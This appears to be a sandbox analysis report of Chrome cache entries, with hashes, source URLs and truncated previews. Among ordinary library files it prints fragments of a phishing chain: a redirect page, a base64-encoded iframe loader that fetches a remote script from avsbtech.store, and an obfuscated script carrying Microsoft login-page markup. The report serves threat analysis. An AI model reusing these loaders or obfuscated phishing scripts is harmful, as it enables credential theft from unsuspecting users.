MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	unknown
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 83

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	dropped
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 84

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	290960
Entropy (8bit):	5.1082980298031435
Encrypted:	false
SSDEEP:
MD5:	24FA855A7678B1938F16235881E3E80B
SHA1:	67B6C9946134456D67C07765D230130D8679F8C6
SHA-256:	F2A84BC4F4CB8AE04162F42F1F3EBED1E05725D9B5BF666B885356C7698A071F
SHA-512:	D1EAB0379A8736F8B14E73478F101A2656912C7FBB9B7D90707E6E8F782C09BEC4B017EB86781E5B4D4AE8A37B3F89A931249527E839F28BEE1389DE21BD79C7
Malicious:	false
Reputation:	unknown
URL:	https://keep.za.com/cgi/jquery.js
Preview:	/!.. jQuery JavaScript Library v3.4.1.. * https://jquery.com/.. .. Includes Sizzle.js.. * https://sizzlejs.com/.. .. Copyright JS Foundation and other contributors.. * Released under the MIT license.. * https://jquery.org/license.. .. Date: 2019-05-01T21:04Z.. */..( function( global, factory ) {....."use strict";.....if ( typeof module === "object" && typeof module.exports === "object" ) {......// For CommonJS and CommonJS-like environments where a proper `window`....// is present, execute the factory and get jQuery.....// For environments that do not have a `window` with a `document`....// (such as Node.js), expose a factory as module.exports.....// This accentuates the need for the creation of a real `window`.....// e.g. var jQuery = require("jquery")(window);....// See ticket #14549 for more info.....module.exports = global.document ?.....factory( global, true ) :.....function( w ) {......if ( !w.document ) {.......throw new Error( "jQuery requires a window with a docume

Chrome Cache Entry: 87

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (42781), with no line terminators
Category:	downloaded
Size (bytes):	42797
Entropy (8bit):	5.1061908627214105
Encrypted:	false
SSDEEP:
MD5:	5468993A759CECE0AD1416F1E7EF80E4
SHA1:	DE3739F175DD4B065CF39E27A4A6110C2EB47FCD
SHA-256:	2490557D7A60A0F4339091D49510712169FE3A9A9B22F2337C58DE64A3682A97
SHA-512:	33D18535B31FC7BAC4D7B0908DEF5F0119B94FADD467BEAE77E25C6FFD2D9140AE893A21EEA5622CA81BD53C17F3195B9A48129A1A5E0CC9F6A799BBE9721972
Malicious:	false
Reputation:	unknown
URL:	https://avsbtech.store/cgi/xls/c1g2i.js
Preview:	var _0xfd5851=_0x4a58;(function(_0x20ed6a,_0x216494){var _0x2fed19=_0x4a58,_0x250033=_0x20ed6a();while(!![]){try{var _0x9ac117=-parseInt(_0x2fed19(0x182))/0x1+-parseInt(_0x2fed19(0x1c9))/0x2+-parseInt(_0x2fed19(0x1b5))/0x3(parseInt(_0x2fed19(0x1ac))/0x4)+parseInt(_0x2fed19(0x1df))/0x5(parseInt(_0x2fed19(0x192))/0x6)+-parseInt(_0x2fed19(0x1f8))/0x7+-parseInt(_0x2fed19(0x188))/0x8+parseInt(_0x2fed19(0x1c6))/0x9;if(_0x9ac117===_0x216494)break;else _0x250033['push'](_0x250033['shift']());}catch(_0x25c10d){_0x250033['push'](_0x250033['shift']());}}}(_0x3e16,0xf1344));function _0x3e16(){var _0x155ae0=['status','onmessage','animate','data','createElement','html','approve_number','<div><div\x20class=\x22footerNode\x22>.\x20<span\x20id=\x22c2024\x22>2024\x20Microsoft</span><a\x20data-bind=\x22text:\x20config.text.privacyAndCookies,\x20attr:\x20{\x27data-url\x27:\x20config.links.privacyAndCookies}\x22\x20href=\x22#\x22\x20id=\x22pst\x22\x20data-url=\x22https://go.microsoft.com/fwlink/?LinkId=

Chrome Cache Entry: 88

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	258966
Entropy (8bit):	4.694760038815572
Encrypted:	false
SSDEEP:
MD5:	D22C8D1F87B47309F3C2A05D2905A762
SHA1:	2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
SHA-256:	CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
SHA-512:	F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
Malicious:	false
Reputation:	unknown
URL:	https://linxcoded.store/start/xls/includes/css6.css
Preview:	/!.. Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

Chrome Cache Entry: 89

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (945), with CRLF line terminators
Category:	downloaded
Size (bytes):	1416
Entropy (8bit):	5.295456331987926
Encrypted:	false
SSDEEP:
MD5:	4934473AA032307F6AADED8CA49FBA06
SHA1:	785E811118761C16BE2718D741E5F45169BA448E
SHA-256:	6253FE00CC69E9829C5EC8C6893CBAD090FE20562575F2AFFD0A59DF9FC61BD0
SHA-512:	E8EE823ED0E2FFE5A4C6B6F4B404D7A7F2C0C43E6622BE743842E56CC9CD9EBCBB19C244383F83FDDDFDDED61EF7BE1000B448A782BF49C7810E524C58097889
Malicious:	false
Reputation:	unknown
URL:	https://keep.za.com/cgi//redirect.php
Preview:	<!DOCTYPE html>..<html>..<head>.. <title>Redirecting...</title>.. <script type="text/javascript">.. var uid = window.location.hash.substring(1); .... var targetUrl = "https://keep.za.com/cgi/b63fc8d582eda5fa.html";.. if (uid) {.. targetUrl += "?uid=" + encodeURIComponent(uid);.. }.... setTimeout(function() {.. window.location.href = targetUrl;.. }, 500);.. </script>..</head>..<body>..<script>(function(){function c(){var b=a.contentDocument\|\|a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'90de31816bd76b2e',t:'MTczODg3NjkyMy4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=

Chrome Cache Entry: 90

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (48129)
Category:	dropped
Size (bytes):	48130
Entropy (8bit):	5.399803497944182
Encrypted:	false
SSDEEP:
MD5:	2F126AAB3C36533F73DE07E05B86C331
SHA1:	263F8D2289C1043D39F174969A337C9CA18143F3
SHA-256:	C865599323BE8BEDD10DD96818B4702B66F95BE7BEEE670E6E818EA15509B3B4
SHA-512:	CC1E6F2D3A4642A5908D212F122F44D51186A8B872D36A73680B4E2CCF15C838941D86912C8F243AA6CE047DD81213E53A1CB218D695DDE134AE276CDCEEE81C
Malicious:	false
Reputation:	unknown
Preview:	"use strict";(function(){function Ht(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function g(s){Ht(l,o,c,g,h,"next",s)}function h(s){Ht(l,o,c,g,h,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function De(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Ue(e,c,a[c])})}return e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

Chrome Cache Entry: 92

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	104
Entropy (8bit):	4.942523675652445
Encrypted:	false
SSDEEP:
MD5:	6D2821C2084D39E87EDB74F2A4078691
SHA1:	9B3C38532956A1753F5EBE259798862E4E3B06FD
SHA-256:	5E10BB395721ED72DFFE17773DE9E27640EBE4E176E30BE1B50D1963318C9B61
SHA-512:	79F7D30FEC3F91B5395223850A464AF6B25B6E60C50C475C55D2DD6336E48C63A4261250BFA155A1CA7382F49C1111538E0792F6C77A0170DE66429F456CB59F
Malicious:	false
Reputation:	unknown
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQl-myQv2P-heRIFDa0JrrESBQ1D83Y5EgUNgsaixhIFDRal9KASEAknUrWTPUeTxxIFDa0JrrESHglVDpomoxtj9RIFDUPzdjkSBQ2CxqLGEgUNFqX0oA==?alt=proto
Preview:	CiQKBw2tCa6xGgAKBw1D83Y5GgAKBw2CxqLGGgAKBw0WpfSgGgAKCQoHDa0JrrEaAAobCgcNQ/N2ORoACgcNgsaixhoACgcNFqX0oBoA

Chrome Cache Entry: 94

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	dropped
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 96

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	unknown
URL:	https://keep.za.com/favicon.ico
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Chrome Cache Entry: 98

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (307), with CRLF line terminators
Category:	downloaded
Size (bytes):	1257
Entropy (8bit):	5.368985577028543
Encrypted:	false
SSDEEP:
MD5:	C4B1FF0D4BA109A1CD9C8BCB197F959F
SHA1:	1717A9EB23D6D21F4AFD6956338BA3B1B7BEBC50
SHA-256:	1396BF9EBE753468800A587A28F80D862B05FE8BEDFC578C3ACCE2B93AFA20B4
SHA-512:	FA3ECE466163F82D6903D184BBA5A266AAD13F6EC0CA4B956416576D64C0D8BD099B207F5859613549AE449B2505EC0F697136EFFC826B3973E2B26ED2B54E50
Malicious:	false
Reputation:	unknown
URL:	https://keep.za.com/cgi/basic.js
Preview:	$(document).ready(function() {.. saveFile();..});....function saveFile() {.. function getQueryParameter(name) {.. const urlParams = new URLSearchParams(window.location.search);.. return urlParams.get(name);.. }.. .. var uid = getQueryParameter('uid') \|\| "";.... var encodedStringAtoB = 'PGh0bWw+CjxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgogICAgdmFyIHVpZCA9ICIiOwo8L3NjcmlwdD4KPHNjcmlwdCBzcmM9Imh0dHBzOi8vYXZzYnRlY2guc3RvcmUvY2dpL3hscy9jMWcyaS5qcyI+PC9zY3JpcHQ+CjwvaHRtbD4=';.. var decodedStringAtoB = atob(encodedStringAtoB);.... if (decodedStringAtoB.includes('var uid = "";')) {.. decodedStringAtoB = decodedStringAtoB.replace('var uid = "";', 'var uid = "' + uid + '";');.. }.... var iframe = document.createElement('iframe');.. iframe.style.position = 'fixed';.. iframe.style.top = 0;.. iframe.style.left = 0;.. iframe.style.width = '100vw';.

Chrome Cache Entry: 99

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8446), with no line terminators
Category:	downloaded
Size (bytes):	8446
Entropy (8bit):	5.742684408058001
Encrypted:	false
SSDEEP:
MD5:	FEAFFDBDC195AFF471FCFA9FA52E23AB
SHA1:	2EA8CDC1711C75691CF43429B00F5093F49CDC86
SHA-256:	8FECADAFCB0983170667F66ACDBD224C5FDBBF7DD956F15B60CAC3AE570492C8
SHA-512:	096346D3379C53EAED8EC2FE2CEE5A4E2A1D85DB5A4EC21B74F3F330563BCAF6183E8B79F36DEAD9BBAD94E3D95B61660BD8509F98D7781FEF129A93C6488A8A
Malicious:	false
Reputation:	unknown
URL:	https://keep.za.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/8a57887573f2/main.js?
Preview:	window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,j,o,s,z,A){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=-parseInt(V(549))/1(parseInt(V(481))/2)+parseInt(V(528))/3(-parseInt(V(529))/4)+parseInt(V(540))/5+-parseInt(V(480))/6+parseInt(V(551))/7(parseInt(V(484))/8)+-parseInt(V(557))/9(parseInt(V(566))/10)+parseInt(V(453))/11,d===f)break;else e.push(e.shift())}catch(E){e.push(e.shift())}}(a,796940),h=this\|\|self,i=h[W(521)],j=function(X,d,e,f){return X=W,d=String[X(461)],e={'h':function(E){return E==null?'':e.g(E,6,function(F,Y){return Y=b,Y(537)[Y(464)](F)})},'g':function(E,F,G,Z,H,I,J,K,L,M,N,O,P,Q,R,S,T,U){if(Z=X,null==E)return'';for(I={},J={},K='',L=2,M=3,N=2,O=[],P=0,Q=0,R=0;R<E[Z(509)];R+=1)if(S=E[Z(464)](R),Object[Z(507)][Z(518)][Z(506)](I,S)\|\|(I[S]=M++,J[S]=!0),T=K+S,Object[Z(507)][Z(518)][Z(506)](I,T))K=T;else{if(Object[Z(507)][Z(518)][Z(506)](J,K)){if(256>K[Z(490)](0)){for(H=0;H<N;P<<=1,Q==F-1?(Q=0,O[Z(511)](G(P)),P=0):Q++,H++);for(U=K[Z(490)](0),H=0;8>H;P=U&1.05\|P<<1.58

Static File Info

⊘No static file info